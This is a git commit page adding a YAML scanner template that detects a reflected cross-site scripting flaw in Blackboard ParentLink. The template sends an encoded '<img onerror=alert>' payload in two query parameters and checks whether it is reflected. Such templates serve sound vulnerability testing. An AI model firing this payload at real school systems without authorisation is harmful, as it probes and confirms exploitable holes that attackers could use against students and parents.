Merge pull request #1066 from r3naissance/master
Add teacherease-xss and parentlink-xss to /vulnerabilities/other/patch-1
commit
47a7ea85e0
|
@ -0,0 +1,31 @@
|
|||
id: parentlink-xss
|
||||
|
||||
info:
|
||||
name: Blackboard ParentLink Reflected XSS
|
||||
author: r3naissance
|
||||
severity: medium
|
||||
tags: blackboard,parentlink,xss
|
||||
reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
|
||||
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<img src=c onerror=alert(8675309)>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue